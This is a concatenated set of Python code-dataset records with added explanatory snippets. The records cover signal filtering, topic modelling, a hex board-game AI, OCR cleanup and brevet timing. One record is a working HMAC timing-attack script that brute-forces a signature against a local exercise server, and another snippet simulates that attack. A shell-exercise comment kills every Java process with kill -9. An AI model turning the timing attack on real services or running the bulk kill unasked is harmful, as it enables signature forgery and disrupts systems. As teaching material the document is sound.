'+str(len(s))+\" len interped: \"+str(len(interp)) + ' len lin:'+str(len(lin))+' len convo:'+str(len(convo)))\n #qp(convo).set(title='convolved result')\n \n return convo[uninterp]\n","sub_path":"notebooks/scripts/filters.py","file_name":"filters.py","file_ext":"py","file_size_in_byte":2860,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"}
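`filterSinc` builds a Blackman-windowed sinc kernel, pads the interpolated signal to tame border effects, then convolves. The same core idea, reduced to a dependency-free low-pass so it runs without quickplot (cutoff `f` is in cycles per sample; all values here are illustrative):

```python
import numpy as np

def lowpass(signal, f, taps=101):
    # Blackman-windowed sinc low-pass, the core of filterSinc without the padding logic.
    n = np.arange(taps)
    h = np.sinc(2 * f * (n - (taps - 1) / 2))   # ideal low-pass impulse response
    h *= np.blackman(taps)                      # taper to reduce spectral ripple
    h /= h.sum()                                # unity gain at DC
    return np.convolve(signal, h, mode="same")

t = np.linspace(0, 1, 500)
noisy = np.sin(2 * np.pi * 3 * t) + 0.5 * np.random.randn(500)
smooth = lowpass(noisy, f=0.02)
print(noisy.std(), smooth.std())  # the filtered signal fluctuates far less
```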
+{"seq_id":"155985788","text":"# Write a program that reads a sentence (keyboard input) and passes it as a parameter to a procedure, \r\n# which must print the sentence with one character per line.\r\n\r\ndef procedimiento (cadena):\r\n\r\n for i in cadena:\r\n\r\n print (i)\r\n\r\nfrase=input(\"enter a sentence:\")\r\n\r\nprocedimiento(frase)","sub_path":"P7/P7-E3.py","file_name":"P7-E3.py","file_ext":"py","file_size_in_byte":310,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"}
+{"seq_id":"477039221","text":"# -*- coding: UTF-8 -*-\n# author: liuyang\n# date: 2018/5/27\n# time: 2:58 PM\n\nfrom __future__ import print_function\n\nfrom word2vec import w2vcluster\nfrom tfidf import tfidfcluster\nfrom sldaModel import sldaModel\nimport collections\nimport os\nimport shutil\n\nclass Util:\n @staticmethod\n def dataProcess(corpus_path):\n f = open(\"train-data.dat\", 'w')\n # corpus_path = './data/sourceCorpus.txt'\n enum = []\n\n for line in open(corpus_path, 'r', encoding='utf-8').readlines():\n enum.extend(line.strip('\\n').split(' '))\n\n word_ID = {word: i for i, word in enumerate(set(enum))}\n # print(len(word_ID))\n\n for line in open(corpus_path, 'r', encoding='utf-8').readlines():\n word = []\n word = line.strip('\\n').split(' ')\n M = len(set(word))\n f.write(str(M))\n m = collections.Counter(word)\n for i in set(word):\n # print(\" \" + str(word_ID[i]) + \":\" + str(m[i]))\n f.write(\" \" + str(word_ID[i]) + \":\" + str(m[i]))\n # print(\"\\n\")\n f.write(\"\\n\")\n\n @staticmethod\n def w2v_slda(w2v_model_path, corpus_path, clusterNum, alpha):\n w2vcluster(w2v_model_path, corpus_path, clusterNum)\n sldaModel(alpha, clusterNum)\n shutil.copy(\"train-data.dat\", \"test-data.dat\")\n shutil.copy(\"train-label.dat\", \"test-label.dat\")\n testdata = \"test-data.dat\"\n testlabel = \"test-label.dat\"\n settings = \"./demo/profile/settings.txt\"\n\n testmodel_path = \"./model/final.model\"\n directory = \"./test_out\"\n\n os.system(r'./demo/profile/slda '\n + \"inf\"\n + r' '\n + testdata\n + r' '\n + testlabel\n + r' '\n + settings\n + r' '\n + testmodel_path\n + r' '\n + directory)\n\n\n @staticmethod\n def tfidf_slda(corpus_path, clusterNum, alpha):\n tfidfcluster(corpus_path)\n sldaModel(alpha, clusterNum)\n shutil.copy(\"train-data.dat\", \"test-data.dat\")\n shutil.copy(\"train-label.dat\", \"test-label.dat\")\n testdata = \"test-data.dat\"\n testlabel = \"test-label.dat\"\n settings = \"./demo/profile/settings.txt\"\n\n testmodel_path = \"./model/final.model\"\n directory = \"./test_out\"\n\n os.system(r'./demo/profile/slda '\n + \"inf\"\n + r' '\n + testdata\n + r' '\n + testlabel\n + r' '\n + settings\n + r' '\n + testmodel_path\n + r' '\n + directory)\n\n\n\n\n\n\n\n\n\n","sub_path":"Chap_2/demo/Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":2717,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"}
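`Util.dataProcess` above emits one bag-of-words line per document in the `count id:freq` format that the slda binary consumes. A toy two-document corpus makes the format concrete (the word IDs depend on set iteration order and are illustrative):

```python
import collections

docs = ["the cat sat", "the dog sat down"]
vocab = {w: i for i, w in enumerate(sorted({w for d in docs for w in d.split()}))}
for d in docs:
    counts = collections.Counter(d.split())
    terms = " ".join("{}:{}".format(vocab[w], n) for w, n in counts.items())
    # each line: number of unique terms, then word_id:frequency pairs
    print(len(counts), terms)
```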
+{"seq_id":"638134784","text":"import math\n\n\nclass Board:\n \"\"\"\n Helper class for representing and manipulating a game board\n \"\"\"\n COLOURS = [\"red\", \"green\", \"blue\"]\n STARTING_HEXES = {\n \"red\": {(-3, 3), (-3, 2), (-3, 1), (-3, 0)},\n \"green\": {(0, -3), (1, -3), (2, -3), (3, -3)},\n \"blue\": {(3, 0), (2, 1), (1, 2), (0, 3)},\n }\n FINISHING_HEXES = {\n \"red\": {(3, -3), (3, -2), (3, -1), (3, 0)},\n \"green\": {(-3, 3), (-2, 3), (-1, 3), (0, 3)},\n \"blue\": {(-3, 0), (-2, -1), (-1, -2), (0, -3)},\n }\n ADJACENT_STEPS = [(-1, +0), (+0, -1), (+1, -1),\n (+1, +0), (+0, +1), (-1, +1)]\n HEXES = {\n (q, r)\n for q in range(-3, +3 + 1)\n for r in range(-3, +3 + 1)\n if -q - r in range(-3, +3 + 1)\n }\n PASS = (\"PASS\", None)\n\n def __init__(self):\n \"\"\"\n Initialise internal board representation\n \"\"\"\n self.board = {qr: \" \" for qr in Board.HEXES}\n for c in Board.COLOURS:\n for qr in Board.STARTING_HEXES[c]:\n self.board[qr] = c\n\n @staticmethod\n def available_actions(board, colour):\n \"\"\"Return available actions for a colour on a board\n\n Modified from the supplied referee code\n\n Arguments:\n board {dict} -- dictionary representing board state\n colour {string} -- string representing player\n\n Returns:\n list -- Available actions\n \"\"\"\n available_actions = []\n for qr in Board.HEXES:\n if board[qr] == colour:\n if qr in Board.FINISHING_HEXES[colour]:\n available_actions.append((\"EXIT\", qr))\n q, r = qr\n for dq, dr in Board.ADJACENT_STEPS:\n for i, atype in [(1, \"MOVE\"), (2, \"JUMP\")]:\n tqr = q + dq * i, r + dr * i\n if tqr in Board.HEXES:\n if board[tqr] == \" \":\n available_actions.append((atype, (qr, tqr)))\n break\n if not available_actions:\n available_actions.append(Board.PASS)\n return available_actions\n\n @staticmethod\n def apply_action(score, board, colour, action):\n \"\"\"Applies an action to a board\n\n Modified from the supplied referee code\n\n Arguments:\n score {dict} -- Dictionary of scores\n board {dict} -- Dictionary representing board state\n colour {string} -- Player to apply action to\n action {tuple} -- Action to apply\n Returns:\n string -- Colour of captured piece for reversing action\n \"\"\"\n atype, aargs = action\n captured = None\n if atype == \"MOVE\":\n qr_a, qr_b = aargs\n board[qr_a] = \" \"\n board[qr_b] = colour\n elif atype == \"JUMP\":\n qr_a, qr_b = (q_a, r_a), (q_b, r_b) = aargs\n qr_c = (q_a + q_b) // 2, (r_a + r_b) // 2\n board[qr_a] = \" \"\n board[qr_b] = colour\n captured = board[qr_c]\n board[qr_c] = colour\n elif atype == \"EXIT\":\n qr = aargs\n board[qr] = \" \"\n score[colour] += 1\n else: # atype == \"PASS\":\n pass\n return captured\n\n @staticmethod\n def reverse_action(score, board, colour, action, captured):\n \"\"\"Reverse an action applied to board\n\n Modified from the supplied referee code\n\n Arguments:\n score {dict} -- Dictionary of scores\n board {dict} -- Dictionary representing board state\n colour {string} -- Player to apply action to\n action {tuple} -- Action to apply\n captured {string} -- If action to reverse was a capture, the colour of the captured piece to restore\n \"\"\"\n atype, aargs = action\n if atype == \"MOVE\":\n qr_a, qr_b = aargs\n board[qr_a] = colour\n board[qr_b] = \" \"\n elif atype == \"JUMP\":\n qr_a, qr_b = (q_a, r_a), (q_b, r_b) = aargs\n qr_c = (q_a + q_b) // 2, (r_a + r_b) // 2\n board[qr_a] = colour\n board[qr_b] = \" \"\n board[qr_c] = captured\n elif atype == \"EXIT\":\n qr = aargs\n board[qr] = colour\n score[colour] -= 1\n else: # atype == \"PASS\":\n pass\n\n @staticmethod\n def terminal_test(scores):\n \"\"\"Test if state is terminal\n\n Arguments:\n scores {dict} -- Game score dictionary\n\n Returns:\n bool -- True if game is over\n \"\"\"\n for colour in Board.COLOURS:\n if scores[colour] == 4:\n return True\n return False\n\n @staticmethod\n def exit_dist(qr, colour):\n \"\"\"Distance a given piece is from exiting\n\n Arguments:\n qr {tuple} -- Tuple representing piece\n colour {string} -- Colour of piece\n\n Returns:\n int -- Distance from exit\n \"\"\"\n q, r = qr\n if colour == \"red\":\n return 3 - q\n if colour == \"green\":\n return 3 - r\n if colour == \"blue\":\n return 3 - (-q - r)\n\n @staticmethod\n def evaluate(board, colour, scores):\n \"\"\"State evaluation function\n\n Arguments:\n board {dict} -- Board to evaluate\n colour {string} -- Player perspective to evaluate from\n scores {dict} -- Score of the state to evaluate\n\n Returns:\n float -- Score of the state\n \"\"\"\n self_score = scores[colour]\n self_count = scores[colour]\n others_score = 0\n others_count = 0\n for c in Board.COLOURS:\n if c != colour:\n others_count += scores[c]\n others_score += scores[c]\n\n self_distances = 0\n others_distances = 0\n pieces = set()\n for qr in board:\n if board[qr] != \" \":\n if board[qr] == colour:\n pieces.add(qr)\n self_count += 1\n self_distances += math.sqrt(\n (abs(Board.exit_dist(qr, board[qr]) - 6)))\n else:\n others_distances += math.sqrt(\n (abs(Board.exit_dist(qr, board[qr]) - 6)))\n others_count += 1\n adjacent_bonus = 0\n for q, r in pieces:\n for dq, dr in Board.ADJACENT_STEPS:\n tqr = (q+dq, r+dr)\n if tqr in pieces:\n adjacent_bonus += 1\n score_weight = 100 if (self_count-others_count) <= 0 else 10000\n count_weight = 1000\n distance_weight = 1\n adjacent_weight = 10\n return score_weight * (self_score - others_score) +\\\n count_weight * (self_count - others_count) +\\\n distance_weight * (self_distances - others_distances) +\\\n adjacent_weight * (adjacent_bonus)\n","sub_path":"flying_solo/utils/board.py","file_name":"board.py","file_ext":"py","file_size_in_byte":7001,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"}
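A quick sanity check of the hex-grid move generation, assuming it runs in the same module as `Board` (the class is not packaged for standalone import):

```python
# Opening-position smoke test for available_actions, run alongside Board.
b = Board()
actions = Board.available_actions(b.board, "red")
moves = [a for a in actions if a[0] == "MOVE"]
jumps = [a for a in actions if a[0] == "JUMP"]
# Red opens with sliding MOVEs only: a JUMP needs an occupied neighbour
# with an empty on-board cell directly beyond it.
print(len(moves), len(jumps))
```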
available_actions.append((\"EXIT\", qr))\n q, r = qr\n for dq, dr in Board.ADJACENT_STEPS:\n for i, atype in [(1, \"MOVE\"), (2, \"JUMP\")]:\n tqr = q + dq * i, r + dr * i\n if tqr in Board.HEXES:\n if board[tqr] == \" \":\n available_actions.append((atype, (qr, tqr)))\n break\n if not available_actions:\n available_actions.append(Board.PASS)\n return available_actions\n\n @staticmethod\n def apply_action(score, board, colour, action):\n \"\"\"Applies an action to a board\n\n Modified from the supplied referee code\n\n Arguments:\n score {dict} -- Dictionary of scores\n board {dict} -- Dictionary representing board state\n colour {string} -- Player to apply action to\n action {tuple} -- Action to apply\n Returns:\n string -- Colour of captured piece for reversing action\n \"\"\"\n atype, aargs = action\n captured = None\n if atype == \"MOVE\":\n qr_a, qr_b = aargs\n board[qr_a] = \" \"\n board[qr_b] = colour\n elif atype == \"JUMP\":\n qr_a, qr_b = (q_a, r_a), (q_b, r_b) = aargs\n qr_c = (q_a + q_b) // 2, (r_a + r_b) // 2\n board[qr_a] = \" \"\n board[qr_b] = colour\n captured = board[qr_c]\n board[qr_c] = colour\n elif atype == \"EXIT\":\n qr = aargs\n board[qr] = \" \"\n score[colour] += 1\n else: # atype == \"PASS\":\n pass\n return captured\n\n @staticmethod\n def reverse_action(score, board, colour, action, captured):\n \"\"\"Reverse an action applied to board\n\n Modified from the supplied referee code\n\n Arguments:\n score {dict} -- Dictionary of scores\n board {dict} -- Dictionary representing board state\n colour {string} -- Player to apply action to\n action {tuple} -- Action to apply\n captured {string} -- If action to reverse was a capture, the colour of the captured piece to restore\n \"\"\"\n atype, aargs = action\n if atype == \"MOVE\":\n qr_a, qr_b = aargs\n board[qr_a] = colour\n board[qr_b] = \" \"\n elif atype == \"JUMP\":\n qr_a, qr_b = (q_a, r_a), (q_b, r_b) = aargs\n qr_c = (q_a + q_b) // 2, (r_a + r_b) // 2\n board[qr_a] = colour\n board[qr_b] = \" \"\n board[qr_c] = captured\n elif atype == \"EXIT\":\n qr = aargs\n board[qr] = colour\n score[colour] -= 1\n else: # atype == \"PASS\":\n pass\n\n @staticmethod\n def terminal_test(scores):\n \"\"\"Test if state is terminal\n\n Arguments:\n scores {dict} -- Game score dictionary\n\n Returns:\n bool -- True if game is over\n \"\"\"\n for colour in Board.COLOURS:\n if scores[colour] == 4:\n return True\n return False\n\n @staticmethod\n def exit_dist(qr, colour):\n \"\"\"Distance a given piece is from exiting\n\n Arguments:\n qr {tuple} -- Tuple representing piece\n colour {string} -- Colour of piece\n\n Returns:\n int -- Distance from exit\n \"\"\"\n q, r = qr\n if colour == \"red\":\n return 3 - q\n if colour == \"green\":\n return 3 - r\n if colour == \"blue\":\n return 3 - (-q - r)\n\n @staticmethod\n def evaluate(board, colour, scores):\n \"\"\"State evaluation function\n\n Arguments:\n board {dict} -- Board to evaluate\n colour {string} -- Player persepective to evaluate from\n scores {dict} -- Score of the state to evaluate\n\n Returns:\n float -- Score of the state\n \"\"\"\n self_score = scores[colour]\n self_count = scores[colour]\n others_score = 0\n others_count = 0\n for c in Board.COLOURS:\n if c != colour:\n others_count += scores[c]\n others_score += scores[c]\n\n self_distances = 0\n others_distances = 0\n pieces = set()\n for qr in board:\n if board[qr] != \" \":\n if board[qr] == colour:\n pieces.add(qr)\n self_count += 1\n self_distances += math.sqrt(\n (abs(Board.exit_dist(qr, board[qr]) - 6)))\n 
+{"seq_id":"4605219","text":"# Created by lixingxing at 2019/3/7\r\n\r\n\"\"\"\r\nFeature: #Enter feature name here\r\n# Enter feature description here\r\n\r\nScenario: #Enter scenario name here\r\n# Enter steps here\r\n\r\nTest File Location: # Enter\r\n\r\n\"\"\"\r\n\r\n\r\nfrom collections import Counter, defaultdict\r\n\r\nfrom image_handlers.ocr_correction.correct_eng_words import correction\r\nimport re\r\nimport os\r\nimport pandas as pd\r\nfrom nltk import ngrams, collocations\r\nfrom tqdm import tqdm\r\n\r\n\r\ndef get_big_en_corpus():\r\n def _text_handler(text):\r\n text = re.sub(r'[\\t\\n]', '', str(text))\r\n text = re.sub(r'[^a-z]', ' ', str(text).lower())\r\n return text\r\n\r\n big_text = pd.read_csv('/Users/lixingxing/IBM/reference/PCB_standard/my_eg_dict/big.txt', sep='\\n',\r\n error_bad_lines=False, header=None, warn_bad_lines=False)\r\n big_text = big_text.values.tolist()\r\n big_text = list(map(_text_handler, big_text))\r\n return big_text\r\n\r\n\r\ndef get_pcb_corpus():\r\n file_folder = '/Users/lixingxing/IBM/reference/PCB_standard/my_cn_dict/txt'\r\n file_contents = []\r\n for f in os.listdir(file_folder):\r\n file_path = os.path.join(file_folder, str(f))\r\n file_content = pd.read_csv(file_path, sep='\\n', encoding='ISO-8859-1', header=None)\r\n file_content_list = file_content.values.tolist()\r\n file_contents.extend(file_content_list)\r\n\r\n new_content = [f[0] for f in file_contents]\r\n pcb_voc_list = list(map(lambda x: re.sub(r'[^a-z]', ' ', str(x).lower()), new_content))\r\n big_text = get_big_en_corpus()\r\n big_text.extend(pcb_voc_list)\r\n return big_text\r\n\r\n\r\ndef sentence_corpus_to_tokens():\r\n mix_big_text = get_pcb_corpus()\r\n tokens = [token for s in mix_big_text for token in s.split(' ') if token != '']\r\n return tokens\r\n\r\n\r\ndef get_score_dicts_from_tokens(tokens):\r\n uni_score_dict = defaultdict(lambda: 0)\r\n uni_gram = list(ngrams(tokens, 1))\r\n uni_score = Counter(uni_gram)\r\n for u_word in uni_score:\r\n uni_score_dict[u_word] = uni_score[u_word]\r\n\r\n bi_score_dict = defaultdict(lambda: 0)\r\n bgm = collocations.BigramAssocMeasures\r\n finder = collocations.BigramCollocationFinder.from_words(tokens)\r\n b_scored = finder.score_ngrams(bgm.likelihood_ratio)\r\n for b_s in b_scored:\r\n bi_score_dict[b_s[0]] = b_s[1]\r\n return uni_score_dict, bi_score_dict\r\n\r\n\r\ndef get_split(elements):\r\n if not elements:\r\n return [[]]\r\n\r\n max_step = 3\r\n\r\n results = []\r\n\r\n for i in range(1, 1 + max_step):\r\n if i <= len(elements):\r\n remain = get_split(elements[i:])\r\n for s in remain:\r\n results.append(elements[:i] + [None] + s)\r\n\r\n return results\r\n\r\n\r\ndef parse_result(r):\r\n string_repr = ''.join([str(e) if e else ' ' for e in r])\r\n return string_repr\r\n\r\n\r\ndef get_candidates_list(token_list):\r\n candidates_list = []\r\n for i, r in enumerate((get_split(token_list))):\r\n candidates_list.append([i for i in parse_result(r).split(' ') if i != ''])\r\n return candidates_list\r\n\r\n\r\ndef connect_split_word_main(word_need_connect):\r\n def _max_total(_candidates_list):\r\n total_score = 0\r\n uni_candidate, bi_candidate = _candidates_list\r\n uni_candidate = list(uni_candidate)\r\n bi_candidate = list(bi_candidate)\r\n if bi_candidate:\r\n for x in range(len(bi_candidate)):\r\n if uni_score_dict[uni_candidate[x]]:\r\n p_x = uni_score_dict[uni_candidate[x]]\r\n p_xy = bi_score_dict[bi_candidate[x]]\r\n p_y_x = p_xy / p_x\r\n total_score += p_y_x\r\n else:\r\n total_score += 0\r\n else:\r\n total_score += uni_score_dict[uni_candidate[0]]\r\n return total_score\r\n\r\n words = word_need_connect.split(' ')\r\n candidates_list = get_candidates_list(words)\r\n\r\n candidate_group = []\r\n candidate_dict = {}\r\n for candi in tqdm(candidates_list):\r\n candi_condition = []\r\n new_candi = [correction(c.lower()) for c in candi]\r\n candi_bi = list(ngrams(new_candi, 2))\r\n candi_uni = list(ngrams(new_candi, 1))\r\n candi_condition.append(tuple(candi_uni))\r\n candi_condition.append(tuple(candi_bi))\r\n candidate_group.append(candi_condition)\r\n candidate_dict[tuple(candi_condition)] = new_candi\r\n\r\n tokens = sentence_corpus_to_tokens()\r\n uni_score_dict, bi_score_dict = get_score_dicts_from_tokens(tokens)\r\n connected_words = ' '.join(candidate_dict[tuple(max(candidate_group, key=_max_total))])\r\n return connected_words\r\n\r\n\r\nif __name__ == '__main__':\r\n # words_token = 'The Bes ic confiqurat ions of Bo ards'\r\n words_token = 'Layer Conf i quration'\r\n connected = connect_split_word_main(words_token)\r\n print('original token is:{}'.format(words_token))\r\n print('connected token is:{}'.format(connected))\r\n","sub_path":"image_handlers/ocr_correction/connect_split_word.py","file_name":"connect_split_word.py","file_ext":"py","file_size_in_byte":4923,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"}
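`get_split` enumerates every way to regroup OCR fragments into chunks of at most `max_step` pieces, with `None` marking the boundaries; `parse_result` then concatenates each chunk into a candidate word. A standalone copy shows the candidates it generates for three fragments:

```python
def get_split(elements, max_step=3):
    # Same recursion as above: chunk the fragment list, None marks a boundary.
    if not elements:
        return [[]]
    results = []
    for i in range(1, 1 + max_step):
        if i <= len(elements):
            for s in get_split(elements[i:], max_step):
                results.append(elements[:i] + [None] + s)
    return results

for r in get_split(["con", "fig", "uration"]):
    print("".join(e if e else " " for e in r).split())
# [['con', 'fig', 'uration'], ['con', 'figuration'],
#  ['config', 'uration'], ['configuration']]
```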
+{"seq_id":"232571154","text":"import requests\nimport datetime\nimport operator\n\ndef main():\n # Timing attack on the signature check: recover the 40-hex-char HMAC one\n # byte at a time, keeping the byte whose request took the longest.\n win = False\n\n brute_force = '0' * 40\n byte_times = {}\n brute_idx = 0\n curr_byte = 0x00\n\n while not win:\n payload = {'file': 'breakme', 'signature': brute_force}\n time_list = []\n\n for i in range(1):\n start = datetime.datetime.now()\n r = requests.get('http://127.0.0.1:8081/crypto', params = payload)\n end = datetime.datetime.now()\n\n if r.status_code == 200:\n win = True\n\n diff = (end - start).total_seconds()\n time_list.append(diff)\n\n byte_times[\"{0:0{1}x}\".format(curr_byte, 2)] = sum(time_list) / len(time_list)\n curr_byte += 1\n\n if curr_byte == 0x100:\n # All 256 candidates tried: keep the slowest one, then move to the next byte\n best = max(byte_times, key=byte_times.get)\n byte_times = {}\n s = list(brute_force)\n s[brute_idx] = best\n s[brute_idx + 1] = ''\n brute_force = \"\".join(s)\n brute_idx += 2\n curr_byte = 0\n else:\n s = list(brute_force)\n s[brute_idx] = \"{0:0{1}x}\".format(curr_byte, 2)\n s[brute_idx + 1] = ''\n brute_force = \"\".join(s)\n\n if brute_idx == 40:\n break\n\n print(win)\n\nif __name__ == '__main__':\n main()\n","sub_path":"part 4/31.py","file_name":"31.py","file_ext":"py","file_size_in_byte":1311,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"}
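The script above keeps the byte with the single longest request, which is fragile under jitter; a common refinement is to take the median of several timings per guess. A self-contained simulation of the same recovery loop, with no HTTP (the 5 ms leak per matching byte and the toy two-byte secret are made up; it runs in a few seconds):

```python
import time
import statistics

SECRET = bytes.fromhex("49c3")

def leaky_compare(guess):
    # Simulated early-exit comparison: 5 ms of work per matching leading byte.
    for a, b in zip(guess, SECRET):
        if a != b:
            return False
        time.sleep(0.005)
    return True

recovered = b""
for pos in range(len(SECRET)):
    timings = {}
    for byte in range(256):
        guess = recovered + bytes([byte]) + b"\x00" * (len(SECRET) - pos - 1)
        samples = []
        for _ in range(3):
            t0 = time.perf_counter()
            leaky_compare(guess)
            samples.append(time.perf_counter() - t0)
        timings[byte] = statistics.median(samples)  # median beats a lone sample
    recovered += bytes([max(timings, key=timings.get)])
print(recovered.hex())  # 49c3
```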
+{"seq_id":"539382226","text":"# 1. Count the processes currently running on the system\n# ps aux | grep java | grep -v grep | wc -l\n\n# 2. Write a script that prints the path of the directory it lives in\n# echo $PWD\n\n# 3. Write a script that shows the current system date and time\n# echo $(date +%Y-%m-%d_%H:%M:%S)\n\n# 4. Write a script that backs up /opt/hatech.log to /tmp, tagging the backup file name with the current system time\n# cp /opt/hatech.log /tmp/hatech.log-$(date +%Y%m%d%H%M%S)\n\n# 5. Use a single command to find every Java process on the server (case-insensitively) and kill them in bulk\n# java_pid=$(ps aux | egrep [Jj][aA][vV][aA] | grep -v grep | awk '{ print $2 }')\n# for pid in ${java_pid}; do\n# kill -9 ${pid}\n# done\n\n# 6. Replace every tab character in hatech.txt with |\n# sed -ie \"s/\\t/|/g\" hatech.txt\n\n# 7. Batch-rename files, uppercasing the extension\nimport os\n\nfor files in os.listdir('./'):\n print(\n os.path.join(\n os.path.splitext(files)[0],\n os.path.splitext(files)[1].upper()).replace('/', '')\n )\n\n# 8. List 10 Python modules you use regularly, showing your depth in Python\n# subprocess, psutil, paramiko, echarts, random\n# re, logging, os, \n\n\n","sub_path":"04day/example.py","file_name":"example.py","file_ext":"py","file_size_in_byte":1111,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"}
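Exercise 7 above only prints the candidate names; an actual batch rename that uppercases the extension would look like this sketch (the `dry_run` guard is an addition, not part of the exercise):

```python
import os

def uppercase_extensions(folder=".", dry_run=True):
    for name in os.listdir(folder):
        root, ext = os.path.splitext(name)
        new_name = root + ext.upper()
        if new_name != name:
            print(name, "->", new_name)
            if not dry_run:
                os.rename(os.path.join(folder, name),
                          os.path.join(folder, new_name))

uppercase_extensions(".")  # with dry_run=True this only prints the planned renames
```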
+{"seq_id":"597236390","text":"\"\"\"\nOpen and close time calculations\nfor ACP-sanctioned brevets\nfollowing rules described at https://rusa.org/octime_alg.html\nand https://rusa.org/pages/rulesForRiders\n\"\"\"\nimport arrow\n\n# The values below will not change often, so we can pre-calculate them.\nspeed_interval = [200, 400, 600, 1000]\n\nspeed_table = {speed_interval[0]: [15, 34],\n speed_interval[1]: [15, 32],\n speed_interval[2]: [15, 30],\n speed_interval[3]: [11.428, 28]}\n\nfinish_time = {200: [5.88, 13.5],\n 300: [9.0, 20.0],\n 400: [12.13, 27.0],\n 600: [18.799, 40.0],\n 1000: [33.08, 75.0]}\n\nexceed_number = 1.1\n\n\n# Note for CIS 322 Fall 2016:\n# You MUST provide the following two functions\n# with these signatures, so that I can write\n# automated tests for grading. You must keep\n# these signatures even if you don't use all the\n# same arguments. Arguments are explained in the\n# javadoc comments.\n\n# Overall closing time limits vary for each brevet according to the distance.\n# These are: (in hours and minutes, HH:MM) 13:30 for 200 KM,\n# 20:00 for 300 KM,\n# 27:00 for 400 KM,\n# 40:00 for 600 KM,\n# 75:00 for 1000 KM.\n# The last control distance should be between the brevet distance and\n# that distance plus 10%, and return the value according to the time limits of the distance\n\ndef get_hour_min_day(hour):\n \"\"\"\n Args:\n hour: a float number of hours after computing\n return:\n a tuple of (days, hours, minutes)\n \"\"\"\n total_minutes = hour * 60\n days = int(hour // 24)\n hours = int((total_minutes // 60) % 24)\n minutes = int(round(total_minutes % 60))\n return days, hours, minutes\n\n\ndef determine_interval(distance):\n \"\"\"\n Args:\n distance: number, the control distance in kilometers\n Returns:\n interval, the index of speed_interval.\n \"\"\"\n index = 0\n for i in range(0, len(speed_interval)):\n if distance > speed_interval[i]:\n index += 1\n return index\n\n\ndef compute_time(distance, interval, speed_type):\n \"\"\"\n Args:\n distance: number, the control distance in kilometers\n interval: number, the interval of distance\n speed_type: boolean, 1 means max speed, and 0 means min speed\n \"\"\"\n time = 0\n while interval >= 0:\n if interval == 0:\n # distance is smaller than or equal to 200\n time += distance / speed_table[speed_interval[0]][speed_type]\n else:\n # distance is greater than 200\n extra_distance = distance - speed_interval[interval-1]\n time += extra_distance / speed_table[speed_interval[interval]][speed_type]\n distance -= extra_distance\n interval -= 1\n return time\n\n\ndef open_time(control_dist_km, brevet_dist_km, brevet_start_time):\n \"\"\"\n Args:\n control_dist_km: number, the control distance in kilometers\n brevet_dist_km: number, the nominal distance of the brevet\n in kilometers, which must be one of 200, 300, 400, 600,\n or 1000 (the only official ACP brevet distances)\n brevet_start_time: An ISO 8601 format date-time string indicating\n the official start time of the brevet\n Returns:\n An ISO 8601 format date string indicating the control open time.\n This will be in the same time zone as the brevet start time.\n \"\"\"\n # invalid case\n if control_dist_km > brevet_dist_km * exceed_number:\n return \"\"\n # edge case: ending\n elif brevet_dist_km <= control_dist_km <= brevet_dist_km * exceed_number:\n time = finish_time[brevet_dist_km][0]\n # normal case\n else:\n time = compute_time(control_dist_km, determine_interval(control_dist_km), 1)\n day, hour, minute = get_hour_min_day(time)\n final_time = arrow.get(brevet_start_time).shift(days=+day, hours=+hour, minutes=+minute)\n return final_time.isoformat()\n\n\ndef close_time(control_dist_km, brevet_dist_km, brevet_start_time):\n \"\"\"\n Args:\n control_dist_km: number, the control distance in kilometers\n brevet_dist_km: number, the nominal distance of the brevet\n in kilometers, which must be one of 200, 300, 400, 600, or 1000\n (the only official ACP brevet distances)\n brevet_start_time: An ISO 8601 format date-time string indicating\n the official start time of the brevet\n Returns:\n An ISO 8601 format date string indicating the control close time.\n This will be in the same time zone as the brevet start time.\n \"\"\"\n # invalid case\n if control_dist_km > brevet_dist_km * exceed_number:\n return \"\"\n # edge case: beginning\n elif control_dist_km == 0:\n time = arrow.get(brevet_start_time).shift(hours=+1)\n return time.isoformat()\n # edge case: ending\n elif brevet_dist_km <= control_dist_km <= brevet_dist_km * exceed_number:\n time = finish_time[brevet_dist_km][1]\n # normal case\n else:\n time = compute_time(control_dist_km, determine_interval(control_dist_km), 0)\n day, hour, minute = get_hour_min_day(time)\n final_time = arrow.get(brevet_start_time).shift(days=+day, hours=+hour, minutes=+minute)\n return final_time.isoformat()\n\n","sub_path":"brevets/acp_times.py","file_name":"acp_times.py","file_ext":"py","file_size_in_byte":5387,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"}
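A worked check of the control-time arithmetic: a 550 km control on a 600 km brevet opens after 200/34 + 200/32 + 150/30 ≈ 17h08 of riding at the maximum speeds, and closes at the 15 km/h floor, 550/15 ≈ 36h40. Run alongside the functions above (the start time is arbitrary):

```python
import arrow  # already a dependency of the module above

start = arrow.get("2023-06-10T06:00:00+00:00")
print(open_time(550, 600, start))   # 2023-06-10T23:08:00+00:00, i.e. 17h08 after start
print(close_time(550, 600, start))  # 2023-06-11T18:40:00+00:00, i.e. 36h40 after start
```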
+{"seq_id":"529235605","text":"import os\nimport matplotlib.pyplot as plt\nimport seaborn as sns\n\n\ndef findnth(string, substring, n):\n\n parts = string.split(substring, n+1)\n\n if len(parts) <= n+1:\n return -1\n\n return len(string)-len(parts[-1])-len(substring)\n\n\nruns = ['2016_07_29_16_50_00']\ncompare = False\n\n\nif __name__ == '__main__':\n\n for run in runs:\n\n filename = os.path.join('code_outputs', run, 'out.txt')\n\n elbos = []\n test_set_elbos = []\n\n with open(filename) as f:\n\n for l in f.readlines():\n if l.startswith('Iteration'):\n elbos.append(float(l[findnth(l, ' ', 3) + 1: findnth(l, ' ', 4)]))\n elif l.startswith('Test set ELBO'):\n test_set_elbos.append(float(l[findnth(l, ' ', 3) + 1: findnth(l, ' ', 4)]))\n\n plt.plot(elbos)\n\n plt.xlabel('Iteration')\n plt.ylabel('Training ELBO')\n\n if not compare:\n\n for f in os.listdir(os.path.join('code_outputs', run)):\n if f.endswith('.py'):\n config_filename = f\n\n if not test_set_elbos:\n title = config_filename\n else:\n title = config_filename + ': test set ELBO = ' + \"{:,}\".format(test_set_elbos[-1])\n\n # 